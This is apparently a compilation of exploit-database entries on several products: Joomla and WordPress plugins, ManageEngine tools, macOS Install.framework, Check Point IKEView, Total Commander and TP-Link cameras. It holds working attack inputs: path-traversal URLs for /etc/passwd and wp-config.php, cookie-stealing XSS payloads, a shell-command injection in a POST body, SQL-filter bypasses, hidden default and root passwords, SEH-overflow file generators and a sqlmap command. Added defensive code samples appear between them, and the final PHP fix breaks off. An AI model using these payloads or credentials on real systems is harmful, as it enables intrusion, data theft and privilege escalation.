
source: https://www.securityfocus.com/bid/56994/info

ZT Autolinks Component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

http://www.example.com/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00 
            
source: https://www.securityfocus.com/bid/56995/info

The Bit Component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

http://www.example.com/index.php?option=com_bit&controller=../../../../../../../../../../../../../../../etc/passwd%00 
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=478

The Install.framework runner suid root binary does not correctly account for the fact that Distributed Objects
can be connected to by multiple clients at the same time.

By connecting two proxy objects to an IFInstallRunner and calling [IFInstallRunner makeReceiptDirAt:asRoot:]
in the first and passing a custom object as the directory name we can get a callback to our code just after the
makeReceiptDirAt code has called seteuid(0);setegid(0) to regain privs. Since BSD privileges are per-process
this means that our other proxy object will now have euid 0 without having to provide an authorization reference.

In this second proxy we can then just call runTaskSecurely and get a root shell before returning from the first proxy's callback function,
which will then drop privs.

Build using the provided makefile and run it, passing the full path to the localhost shell.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38136.zip
            
source: https://www.securityfocus.com/bid/57190/info


The Incapsula component for Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Incapsula 1.4.6_b and prior are vulnerable. 

http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Security.php?token="><script>alert(document.cookie)</script>

http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Performance.php?token="><script>alert(document.cookie)</script> 
            
Exploit Title: ManageEngine EventLog Analyzer SQL query execution
Product: ManageEngine EventLog Analyzer
Vulnerable Versions: v10.6 build 10060 and previous versions
Tested Version: v10.6 build 10060 (Windows)
Advisory Publication: 14/09/2015
Vulnerability Type: authenticated SQL query execution
Credit: xistence <xistence[at]0x90.nl>

Product Description
-------------------

EventLog Analyzer carries out log analysis for all Windows, Linux and Unix
systems, switches and routers (Cisco), other syslog-supporting devices, and
applications like IIS and MS SQL. The EventLog Analyzer application is capable
of performing real-time log file analysis. It can also carry out log file
analysis of imported files, which can be imported from the archive or from any
machine.

When an important security event is generated on a machine in the network,
the application collects it, performs log analysis and displays the event on
the EventLog Analyzer dashboard in real time. The event log report is
generated from the analyzed event logs. From the event log reports (graphs),
you can drill down to the raw log events, do a root cause analysis within
minutes, and then focus on resolving it.

The application carries out analysis of imported and archived log files to
fulfill the requirements of forensic analysis and event log audit. Forensic
and audit reports can be generated from the analyzed logs.


Vulnerability Details
---------------------

Every user can execute SQL queries through the "/event/runQuery.do" script,
including the default "guest" user (the SQL query option is merely not
visible in the web interface).
Below is the POST request, executed as "guest":

POST /event/runQuery.do HTTP/1.1
Host: 192.168.2.116:8400
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=XXXXXXXXXX
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

execute=true&query=select+version%28%29


Queries starting with "INSERT" or "UPDATE" are denied by default; however,
this can be bypassed by placing a SELECT statement first, like this:

"SELECT 1;INSERT INTO ..."

The bundled PostgreSQL backend runs with SYSTEM privileges on Windows,
allowing files to be written to disk with those privileges.

A Metasploit exploit module will be released shortly.


Solution
--------
ManageEngine has provided a patch to fix this issue; the steps to apply it
are as follows:

1. Stop the ELA service.
2. Download the archive from
http://bonitas2.zohocorp.com/zipUploads/2015_14_07_17_52_30_o_19q686iqs1sfemdf19e05sqre61.tar.gz
and extract it. You will have two folders, "EventLogAnalyzerJSP" and
"LogAnalyzerClient", under "o_19q686iqs1sfemdf19e05sqre61". Copy these two
folders and place them under the <ELA Home>//lib/ folder.
3. The paths of the following files will then be:

runQuery_jsp.class --> <ELA Home>\\lib\\EventLogAnalyzerJSP\\com\\adventnet\\sa\\jsp\\WEB_002dINF\\jsp
RunQuery.class --> <ELA Home>\\lib\\LogAnalyzerClient\\com\\adventnet\\la\

4. Restart the ELA service and check for the issue.


Advisory Timeline
-----------------

07/11/2015 - Discovery and vendor notification
07/13/2015 - ManageEngine acknowledged issue
07/14/2015 - ManageEngine supplied fix
07/16/2015 - Verified fix and replied back to ManageEngine that the issue has been resolved
09/14/2015 - Public disclosure
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=477

Install.framework has a suid root binary here: /System/Library/PrivateFrameworks/Install.framework/Resources/runner
This binary vends the IFInstallRunner Distributed Object, which has the following method:

  [IFInstallRunner makeReceiptDirAt:asRoot:]

If you pass 1 for asRoot, then this code will treat the makeReceiptDirAt string as a path and make two directories
(Library/Receipts) below it. At first glance this code looks immediately racy and no doubt we could play some
symlink tricks to get arbitrary directories created, but, on second glance, we can do a lot more!

This code is using Distributed Objects, which is a "transparent" IPC mechanism: what this means in practice is that
not only can I call methods on the IFInstallRunner object running in the suid root process, but I can also pass it objects
from my process; when the suid root process then tries to call methods on those objects this will actually result in callbacks
into my process :)

In this case, rather than just passing an NSString as the makeReceiptDirAt parameter, I create and pass an instance of my own class
"InitialPathObject" which behaves a bit like a string but gives me complete control over its behaviour from my process.

By creating a couple of these custom classes and implementing various methods we can reach calls to mkdir, chown and unlink with euid == 0.
We can completely control the string passed to mkdir and unlink.
In the chown case the code will chown our controlled path to root:admin; regular OS X users are members of the admin group, which means that this
will give the user access to files which previously belonged to a different group.

To hit the three actions (mkdir, chown and unlink) with controlled arguments we need to override various
combinations of selectors and fail at the right points:

InitialPathObject = the object we pass to the makeReceiptDirAt selector
  overrides: - stringByAppendingPathComponent
               * will be called twice:
                  * first time:  return an NSString* pointing to a non-existent file
                  * second time: return SecondFakeStringObject

SecondFakeStringObject = returned by the second call to stringByAppendingPathComponent
  overrides: - length
               * will be called by the NSFileManager?
               * return length of path to non-existent file
             - getCharacters:
               * will be called by the NSFileManager?
               * return characters of the non-existent file path
             - fileSystemRepresentation
               * for MKDIR:
                 * first time: return char* of the target path
                 * second time: return char* to non-existent file
                 * third time: return char* to non-existent file
               * for CHOWN:
                 * first time: return char* of temporary directory to create and ignore
                 * second time: return char* of target path
               * for UNLINK:
                 * first time: return char* of temporary directory to create and ignore
                 * second time: return char* to non-existent file
                 * third time: return char* to path to unlink
             - stringByAppendingPathComponent:
               * for MKDIR:
                 * not called
               * for CHOWN:
                 * return NSString* pointing to a file which does exist // to bail out before creating /Receipts
               * for UNLINK:
                 * not called

build: clang -o as_root_okay_then_poc as_root_okay_then_poc.m -framework Foundation
run: ./as_root_okay_then_poc MKDIR|CHOWN|UNLINK <target>

Note that this will create some root-owned temporary directories in /tmp which will need to be cleaned up manually.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38137.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=314

The private Install.framework has a few helper executables in /System/Library/PrivateFrameworks/Install.framework/Resources,
one of which is suid root:

-rwsr-sr-x   1 root  wheel   113K Oct  1  2014 runner

Taking a look at it we can see that it's vending an objective-c Distributed Object :)
[ https://developer.apple.com/library/mac/documentation/Cocoa/Conceptual/DistrObjects/DistrObjects.html ]

The main function immediately and temporarily drops privs by doing
  seteuid(getuid()); setegid(getgid());

then reads a line from stdin. It passes this to NSConnection rootProxyForConnectionWithRegisteredName to look up that
name in the DO namespace and create a proxy through which to connect to it.

It then allocates an IFInstallRunner, which in its init method vends itself using a name made up of its pid, time() and random().

It then calls the setRunnerConnectionName method on the proxy to tell it the IFInstallRunner's DO name, so that whoever
ran the runner can connect to the IFInstallRunner.

The IFRunnerMessaging protocol tells us the methods and prototypes of the remote methods we can invoke on the IFInstallRunner.

Most of the methods begin with a call to processKey, which will set the euid back to root if the process can provide a valid admin
authorization reference from authd (I'm not totally sure how that bit works yet, but it's not important for the bug.) Otherwise the euid
will remain equal to the uid and the methods (like movePath, touchPath etc.) will only run with the privs of the user.

The methods then mostly end with a call to restoreUIDs, which will drop back to euid==uid if we did temporarily regain root privs (with the auth ref).

Not all methods we can invoke are like that though...

IFInstallRunner setExternalAuthorizationRef calls

  seteuid(0);setegid(0);

to regain root privs without requiring any auth. It then calls AuthorizationCreateFromExternalForm, passing the bytes of an NSData we give it.

If that call doesn't return 0 then the error branch calls syslog with the string "Fatal error: unable to internalize authorization reference.",
but nothing is actually fatal: it just returns from the method, whereas the success branch goes on to restore the euid and egid. This means
that if we can get AuthorizationCreateFromExternalForm to fail then we can get the priv dropping-regaining state machine out of sync :)

Getting AuthorizationCreateFromExternalForm to fail is trivial: just provide a malformed auth_ref (like "AAAAAAAAAAAAAAAAAAA").

Now the next method we invoke will run with euid 0 even without having the correct auth ref :)

This PoC first calls setBatonPath to point the baton executable path to a localhost bind-shell, then triggers the bug
and calls runTaskSecurely, which will create an NSTask and launch the bind-shell with euid 0 :) We can then just nc to it and get a root shell.

tl;dr:
the error path in setExternalAuthorizationRef should either be fatal or drop privs!

Make sure you have the latest Xcode installed and run the get_shell.sh script to build and run the PoC.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38138.zip
            
Exploit Title: ManageEngine OpManager multiple vulnerabilities
Product: ManageEngine OpManager
Vulnerable Versions: v11.5 and previous versions
Tested Version: v11.5 (Windows)
Advisory Publication: 14/09/2015
Vulnerability Type: hardcoded credentials, SQL query protection bypass
Credit: xistence <xistence[at]0x90.nl>


Product Description
-------------------

ManageEngine OpManager is network, server, and virtualization monitoring
software that helps SMEs, large enterprises and service providers manage
their data centers and IT infrastructure efficiently and cost-effectively.
Automated workflows, intelligent alerting engines, configurable discovery
rules, and extendable templates enable IT teams to set up a 24x7 monitoring
system within hours of installation.
Do-it-yourself plug-ins extend the scope of management to include network
change and configuration management and IP address management, as well as
monitoring of networks, applications, databases, virtualization and
NetFlow-based bandwidth.


Vulnerability Details
---------------------

ManageEngine OpManager ships with a default account "IntegrationUser" with
the password "plugin". This account is hidden from the user interface and
never shows up in user management. Changing the password for this account
is also not possible by default. The account is nevertheless assigned
Administrator privileges, and logging in with it via the web interface is
possible.

Below you can see the account in the PostgreSQL database after a fresh
installation:

C:\ManageEngine\OpManager\pgsql\bin>psql.exe -h 127.0.0.1 -p 13306 -U postgres -d OpManagerDB
psql (9.2.4)

OpManagerDB=# select * from userpasswordtable where userid = 2;
 userid |    username     | password  | ownername | domainname | sipenabled
--------+-----------------+-----------+-----------+------------+------------
      2 | IntegrationUser | d7962CgyJ | NULL      | NULL       | false
(1 row)

The above password decrypted is "plugin".

Any account with Administrator rights on the web interface can use a web
form (/api/json/admin/SubmitQuery) to execute SQL queries on the backend
PostgreSQL instance.
By default, restrictions apply: queries that start with INSERT/UPDATE/DELETE
are not allowed to be executed. This is, however, very easy to bypass with
something like "INSERT/**/INTO...". The "/**/" comment acts as a space, so
the statement is not detected by OpManager's protection and is executed.

The PostgreSQL environment runs as SYSTEM under Windows. By writing a WAR
payload to the "tomcat/webroot" directory, the WAR payload is deployed
automatically and yields a shell with SYSTEM privileges.

A Metasploit module will be released shortly.


Solution
--------

ManageEngine has provided a patch to fix this issue:
https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability


Advisory Timeline
-----------------

05/17/2015 - Discovery and vendor notification
05/22/2015 - ManageEngine acknowledged issue
07/10/2015 - Requested status update
07/17/2015 - ManageEngine supplied fix
07/24/2015 - ManageEngine provided definitive fix at https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability
09/14/2015 - Public disclosure
            
# Exploit Title: EZ SQL Reports < 4.11.37: Arbitrary File Download (admin/collaborator required)
# Google Dork: -
# Date: 12/09/2015
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/elisqlreports/
# Software Link: https://downloads.wordpress.org/plugin/elisqlreports.4.11.33.zip
# Version: < 4.11.33, fixed in 4.11.37
# Tested on: Debian GNU/Linux 7 with Wordpress 4.3
# CVE : N/A
#
# Summary: The plugin allows a WordPress site administrator or
# collaborator to download arbitrary files from the host file system
# through the plugin's functionality of downloading .sql, .sql.zip or
# .sql.gz files created by the WordPress administrator.
# The file name to download is not sanitized, and a path traversal can be
# injected in the request.
#
# Timeline:
# - 09/09/2015: First contact with the author
# - 11/09/2015: Author creates a fix and communicates it to me
# - 12/09/2015: Public release of the new plugin version

# POC: To retrieve the wp-config.php file:

GET /wp-admin/admin.php?page=ELISQLREPORTS-settings&Download_SQL_Backup=../../../wp-config.php HTTP/1.1
Host: <the host with the wordpress>
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: <User-Agent>
Referer: http://<the host with the wordpress>/wp-admin/admin.php?page=ELISQLREPORTS-settings
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_[...etc...]4af418c3efd
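The Joomla! LFI entries earlier on this page (a "../" sequence ending in "%00") and this download handler (a "../../../" sequence) both come from trusting a user-supplied file name. The Python below is an added illustration, not the plugin's code, of the check such a download endpoint should perform before serving anything; the backup directory, file names and file contents it builds are constructed for the demo.

```python
import os
import tempfile
from urllib.parse import unquote

# File types the plugin's download feature exists to serve (taken from the advisory).
ALLOWED_SUFFIXES = (".sql", ".sql.zip", ".sql.gz")


def resolve_backup_download(backup_dir, requested):
    """Return the absolute path to serve, or None when the request is rejected.

    `requested` is the raw Download_SQL_Backup value. Any single rule below
    would have refused the traversal requests quoted on this page:
      1. no NUL byte, raw or percent-encoded ("%00"), anywhere in the name
      2. a bare file name: no '/', no '\\', not '.' or '..'
      3. one of the backup suffixes the feature is meant to serve
      4. after symlink resolution the path still lies inside backup_dir
    """
    name = unquote(requested)
    if "\x00" in name:
        return None
    if name in (".", "..") or "\\" in name or os.path.basename(name) != name:
        return None
    if not name.lower().endswith(ALLOWED_SUFFIXES):
        return None
    base = os.path.realpath(backup_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def demo():
    """Constructed layout: a backup directory holding one dump, with a
    wp-config.php one level above it, the shape the PoC request reaches for."""
    root = tempfile.mkdtemp()
    backups = os.path.join(root, "backups")
    os.mkdir(backups)
    with open(os.path.join(backups, "site.2015-09-12.sql.gz"), "wb") as fh:
        fh.write(b"\x1f\x8b")  # constructed placeholder, not a real gzip stream
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write("<?php define('DB_PASSWORD', 'constructed');\n")
    return {
        "legit": resolve_backup_download(backups, "site.2015-09-12.sql.gz"),
        "traversal": resolve_backup_download(backups, "../wp-config.php"),
        "backslash": resolve_backup_download(backups, "..\\wp-config.php"),
        "nul": resolve_backup_download(backups, "../../../etc/passwd%00.sql"),
        "wrong_suffix": resolve_backup_download(backups, "wp-config.php"),
    }


if __name__ == "__main__":
    for label, path in demo().items():
        print(f"{label:>12}: {'served ' + path if path else 'rejected'}")
```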


# Exploit Title: EZ SQL Reports < 4.11.37: Arbitrary Code Execution (admin/collaborator required)
# Google Dork: -
# Date: 12/09/2015
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/elisqlreports/
# Software Link: https://downloads.wordpress.org/plugin/elisqlreports.4.11.33.zip
# Version: < 4.11.33, fixed in 4.11.37
# Tested on: Debian GNU/Linux 7 with Wordpress 4.3
# CVE : N/A
#
# Summary: There are several calls to "passthru" in the code. One of
# them receives the username, password, database name and host from
# the $_POST arguments, so you can inject into each of these parameters
# the ";" character, or others like "&&" or "||", to execute other
# commands in addition to "/usr/bin/mysql".
#
# Timeline:
# - 09/09/2015: First contact with the author
# - 11/09/2015: Author creates a fix and communicates it to me
# - 12/09/2015: Public release of the new plugin version

# POC: Send a POST request like this to create a file named "testrce.txt"
# in the wp-admin folder. The parameters DB_NAME, DB_HOST, DB_USER and
# DB_PASSWORD are injectable:

POST /wp-admin/admin.php?page=ELISQLREPORTS-settings HTTP/1.1
Host: <wordpress web>
Proxy-Connection: keep-alive
Content-Length: 177
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://<wordpress web>
Upgrade-Insecure-Requests: 1
User-Agent: <the user agent>
Content-Type: application/x-www-form-urlencoded
Referer: http://<wordpress web>/wp-admin/admin.php?page=ELISQLREPORTS-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_8fa[...etc...]b7d

DB_NAME=<the db name>%3B+touch+testrce.txt%3B+&DB_HOST=127.0.0.1&DB_USER=<theuser>&DB_PASSWORD=<thepassword>&db_date=z.2015-08-27-20-22-29.manual.wp.127.0.0.1.sql.zip&db_nonce=au78c5ff86
            
source: https://www.securityfocus.com/bid/57212/info

Dell OpenManage Server Administrator is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

OpenManage Server Administrator 7.1.0.1 and prior versions are vulnerable. 

https://www.example.com:1311/help/sm/en/Output/wwhelp/wwhimpl/js/html/index_main.htm?topic="></iframe><iframe src="javascript:alert(/xss/) 
            
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt



Vendor:
================================
www.checkpoint.com
http://pingtool.org/downloads/IKEView.exe



Product:
==================================================
IKEView.exe Feature Pack NGX R60 - Build 591000004

IKEView.exe is used to inspect Internet Key Exchange (IKE) phase 1 and
phase 2 packets exchanged with switches and gateways on the firewall.


IKEView is a Check Point partner tool available for VPN troubleshooting
purposes.
It is a Windows executable that can be downloaded from Checkpoint.com.
It parses the IKE.elg file located on the firewall.

To use IKEVIEW for VPN troubleshooting do the following:

1. From the checkpoint firewall type the following:

vpn debug ikeon

This will create the IKE.elg file located in $FWDIR/log


2. Attempt to establish the VPN tunnel. All phases of the connection will
be logged to the IKE.elg file.


3. SCP the file to your local desktop.
WINSCP works great

4. Launch IKEVIEW and select File>Open. Browse to the IKE.elg file.



Vulnerability Type:
======================
Stack Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
=====================
IKEView.exe is vulnerable to a local stack-based buffer overflow when parsing
a malicious Internet Key Exchange ".elg" file.
The vulnerability causes nSEH and SEH pointer overwrites at 4432 bytes once
IKEView parses our malicious file, which may then result in arbitrary
attacker-supplied code execution.

Tested on Windows SP1


0018F868  |41414141  AAAA
0018F86C  |01FC56D0  ÐVü  ASCII "File loaded in 47 minutes, 00 seconds."
0018F870  |41414141  AAAA
0018F874  |41414141  AAAA  Pointer to next SEH record
0018F878  |42424242  BBBB  SE handler
0018F87C  |00000002   ...


Quick Buffer Overflow POC :
===========================


1) Save the Python below as a .py file and run it; it will generate the POC file.
Open that file in IKEView.exe and KABOOOOOOOOOOOOOOOOOOOOM!

seh = "B" * 4  # <-- will overwrite SEH with a run of 0x42, the hex for the ASCII char 'B'

file = "C:\\IKEView-R60-buffer-overflow.elg"
x = open(file, "w")
payload = "A" * 4428 + seh  # 4428 bytes of padding, then the 4 bytes that land on the SE handler
x.write(payload)
x.close()

print("\n=======================================\n")
print(" IKEView-R60-buffer-overflow.elg file created\n")
print(" hyp3rlinx ...")
print("=========================================\n")



Exploitation Technique:
=======================
Local



Severity Level:
=========================================================
High



Description:
==========================================================


Vulnerable Product:             [+] IKEView.exe Feature Pack NGX R60 - Build 591000004


Vulnerable File Type:           [+] .elg


Affected Area(s):               [+] Local OS


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
            
source: https://www.securityfocus.com/bid/57200/info

The NextGEN Gallery plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

NextGEN Gallery 1.9.10 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=[Xss] 
            
source: https://www.securityfocus.com/bid/57230/info
  
TinyBrowser is prone to multiple vulnerabilities.
  
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
  
http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie)) 
            
source: https://www.securityfocus.com/bid/57230/info
   
TinyBrowser is prone to multiple vulnerabilities.
   
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
   
http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=
            
'''
********************************************************************************************
# Exploit Title: Total Commander 32bit SEH Overwrite.
# Date: 8/27/2015
# Exploit Author: Un_N0n
# Software Vendor: http://www.ghisler.com/
# Software Link: http://www.ghisler.com/download.htm
# Version: 8.52
# Tested on: Windows 8 x64(64 BIT)
********************************************************************************************
[Info:]
EAX 00106541 
ECX FFFFFEFA
EDX 0031E941
EBX 04921F64
ESP 001065FC 
EBP 41414141
ESI 04930088
EDI 0031E9B0

EIP 41414141

SEH chain of main thread, item 0
	Address=001065FC
	SE handler=41414141
'''

[Steps to Produce the Crash]:
1- Open up 'TOTALCMD.EXE'.
2- Go to Files -> Change Attributes.
3- In the time field, paste in the contents of 'Crash.txt'.
~ The software will crash because of the SEH overwrite.

[Code for CRASH.txt]
file = open("crash.txt", 'w')
file.write("A" * 5000)
file.close()

-> After reporting,
	the vendor released a bugfix version (8.52a, 9 Sept 2015).
**********************************************************************************************
            
source: https://www.securityfocus.com/bid/57230/info
    
TinyBrowser is prone to multiple vulnerabilities.
    
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
    
http://www.example.com/js/tiny_mce/plugins/tinybrowser/edit.php?type=
            
TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi Hard-Coded Credentials
Vendor: TP-LINK Technologies Co., Ltd.
Product web page: http://www.tp-link.us
Affected version: NC220 V1 1.0.28 Build 150629 Rel.22346
                  NC200 V1 2.0.15 Build 150701 Rel.20962

Summary: Designed with simplicity in mind, TP-LINK's Cloud Cameras are a
fast and trouble-free way to keep track of what's going on in and around
your home. Video monitoring, recording and sharing has never been easier
with the use of TP-LINK's Cloud service. The excitement of possibilities
never ends.

Desc: The NC220 and NC200 use hard-coded credentials within their Linux
distribution image. This set of credentials (root:root) is never exposed
to the end user and cannot be changed through any normal operation of the
camera.

Tested on: Linux


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5255
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php


20.07.2015

--


Initializing...
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin |grep root
root_uImage
p2048_newroot.cer
root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:bin/sh
Nproot:x:0:
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin | grep home > crack.me
root@zslab:~# john crack.me
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
root             (root)
guesses: 1  time: 0:00:00:00 DONE (Mon Aug  3 05:52:55 2015)  c/s: 400  trying:
root - Userroot
Use the "--show" option to display all of the cracked passwords reliably
root@zslab:~# john crack.me --show
root:root:0:0:Linux User,,,:/home/root:/bin/sh

1 password hash cracked, 0 left
root@zslab:~#
            
# Exploit Title: WordPress: cp-reservation-calendar 1.1.6 SQL injection
# Date: 2015-09-15
# Google Dork: Index of /wp-content/plugins/cp-reservation-calendar/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: https://downloads.wordpress.org/plugin/cp-reservation-calendar.zip
# Version: 1.1.6
# OWASP Top10: A1-Injection

A vulnerability has been detected in the WordPress cp reservation calendar plugin v1.6.
The vulnerability allows remote attackers to inject SQL commands.
The SQL injection vulnerability is located in the `dex_reservations.php` file.
Remote attackers are able to execute their own SQL commands by manipulating requested parameters.

The security risk of the SQL injection vulnerability is estimated as high, with a CVSS (Common Vulnerability Scoring System) score of 8.6.
Exploitation of the remote SQL injection web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the remote SQL injection results in database management system, web-server and web-application compromise.

============================
vulnerable function code...
============================

function dex_reservations_calendar_load2() {
    global $wpdb;
    if ( ! isset( $_GET['dex_reservations_calendar_load2'] ) || $_GET['dex_reservations_calendar_load2'] != '1' )
        return;
    @ob_clean();
    header("Cache-Control: no-store, no-cache, must-revalidate");
    header("Pragma: no-cache");

    // the following line is vulnerable: $_GET["id"] is concatenated into the query without escaping or a prepared statement

    $calid = str_replace(TDE_RESERVATIONCAL_PREFIX, "", $_GET["id"]);
    $query = "SELECT * FROM ".TDE_RESERVATIONCALENDAR_DATA_TABLE." where ".TDE_RESERVATIONDATA_IDCALENDAR."='".$calid."'";
    $row_array = $wpdb->get_results($query, ARRAY_A);
    foreach ($row_array as $row)
    {
        $d1 = date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_S]));
        $d2 = date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_E]));

        echo $d1."-".$d2."\n";
        echo $row[TDE_RESERVATIONDATA_TITLE]."\n";
        echo $row[TDE_RESERVATIONDATA_DESCRIPTION]."\n*-*\n";
    }

    exit();
}

The following URL executes the vulnerable function:

http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1
------------------------------------------------------------------------------------
PoC using the sqlmap tool:

python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1" \
  -p id --level=5 --risk=3 --dbms="MySQL" --dbs

##########################################################################

The following URL is also vulnerable:

http://localhost/wordpress/?action=dex_reservations_check_posted_data

POST parameters:
-------------------------------------
dex_reservations_post=1&dex_item=1
------------------------------------

An unauthenticated user can use this URL to inject malicious SQL code;
the POST parameter `dex_item` is the vulnerable one.

======================
   vulnerable code
=====================

The vulnerable function is located in `dex_reservations.php`:

function dex_reservations_get_option ($field, $default_value)
{
    global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
    if ($dex_option_buffered_id == CP_CALENDAR_ID)
        $value = $dex_option_buffered_item->$field;
    else
    {
        // CP_CALENDAR_ID is concatenated, unquoted and unvalidated, into the WHERE clause
        $myrows = $wpdb->get_results( "SELECT * FROM ".DEX_RESERVATIONS_CONFIG_TABLE_NAME." WHERE id=".CP_CALENDAR_ID );
        $value = $myrows[0]->$field;
        $dex_option_buffered_item = $myrows[0];
        $dex_option_buffered_id  = CP_CALENDAR_ID;
    }
    if ($value == '' && $dex_option_buffered_item->calendar_language == '')
        $value = $default_value;
    return $value;
}


When this function is called, the constant CP_CALENDAR_ID must contain an integer, but the value it is defined from
(the `dex_item` POST parameter) is never validated.
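A hardened version of both vulnerable queries, added here as an example and not taken from the plugin: request data is bound through `$wpdb->prepare()` rather than concatenated. The definition site of CP_CALENDAR_ID is assumed (the advisory only shows the query that consumes it), and `dex_reservations_calendar_load2_fixed` is a hypothetical name.

```php
<?php
// Added example, not the plugin's own code: both queries from the advisory,
// with request data bound through $wpdb->prepare() instead of concatenated.
// Table/column names stay concatenated: they are plugin constants, not input.

function dex_reservations_calendar_load2_fixed() {
    global $wpdb;
    if ( ! isset( $_GET['dex_reservations_calendar_load2'] ) || $_GET['dex_reservations_calendar_load2'] != '1' )
        return;
    @ob_clean();
    header("Cache-Control: no-store, no-cache, must-revalidate");
    header("Pragma: no-cache");

    // Same prefix stripping as the original; the value is then bound as %s, so
    // prepare() escapes and quotes it and the quotes are no longer a break-out point.
    $calid = str_replace( TDE_RESERVATIONCAL_PREFIX, "", isset( $_GET["id"] ) ? $_GET["id"] : "" );
    $query = $wpdb->prepare(
        "SELECT * FROM " . TDE_RESERVATIONCALENDAR_DATA_TABLE .
        " WHERE " . TDE_RESERVATIONDATA_IDCALENDAR . " = %s",
        $calid
    );
    $row_array = $wpdb->get_results( $query, ARRAY_A );
    foreach ( $row_array as $row ) {
        $d1 = date( "m/d/Y", strtotime( $row[TDE_RESERVATIONDATA_DATETIME_S] ) );
        $d2 = date( "m/d/Y", strtotime( $row[TDE_RESERVATIONDATA_DATETIME_E] ) );
        echo $d1 . "-" . $d2 . "\n";
        echo $row[TDE_RESERVATIONDATA_TITLE] . "\n";
        echo $row[TDE_RESERVATIONDATA_DESCRIPTION] . "\n*-*\n";
    }
    exit();
}

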